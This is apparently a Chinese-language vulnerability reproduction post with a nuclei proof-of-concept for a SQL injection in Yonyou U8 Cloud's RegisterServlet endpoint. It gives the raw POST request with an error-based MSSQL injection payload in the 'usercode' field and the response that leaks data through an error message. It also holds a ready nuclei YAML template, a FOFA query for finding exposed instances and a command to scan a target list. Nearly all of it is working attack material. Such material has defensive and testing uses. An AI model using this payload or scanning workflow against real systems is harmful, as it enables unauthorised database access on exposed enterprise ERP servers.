用友u8-cloud RegisterServlet SQL注入漏洞复现 nuclei poc

POST /servlet/RegisterServlet HTTP/1.1Host: 192.168.86.128:8089User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36Connection: closeContent-Length: 85Accept: */*Accept-Language: enContent-Type: application/x-www-form-urlencodedX-Forwarded-For: 127.0.0.1Accept-Encoding: gzip
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

HTTP/1.1 200 OKConnection: closeContent-Length: 71Date: Mon, 13 Nov 2023 02:25:54 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=F66A9268A74114BADA7CB11346378B11.server; Path=/; HttpOnly
Error:?? nvarchar ? 'e10adc3949ba59abbe56e057f20f883e' ??????? int ????

id: yonyou-u8-cloud-RegisterServlet-sqli
info:  name: 用友 u8-cloud RegisterServlet SQL注入漏洞  author: fgz  severity: high  description: 'U8 cloud是用友推出的企业上云数字化平台，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案，全面支持多组织业务协同、营销创新、智能财务、人力服务，构建产业链制造平台，融合用友云服务，实现企业互联网资源连接、共享、协同，赋能中国成长型企业高速发展、云化创新。该产品存在SQL注入漏洞，攻击者可通过该漏洞获取数据库权限。'  tags: 2023,u8-cloud,sqli,yonyou  metadata:    max-request: 3    fofa-query: title="u8c"    verified: true
http:  - method: POST    path:      - "{{BaseURL}}/servlet/RegisterServlet"    headers:      Content-Type: application/x-www-form-urlencoded      X-Forwarded-For: 127.0.0.1    body: "usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--"    matchers:      - type: word        words:          - "e10adc3949ba59abbe56e057f20f883e"        condition: and

nuclei.exe -l u8cloud.txt -t yonyou-u8-cloud-RegisterServlet-sqli.yaml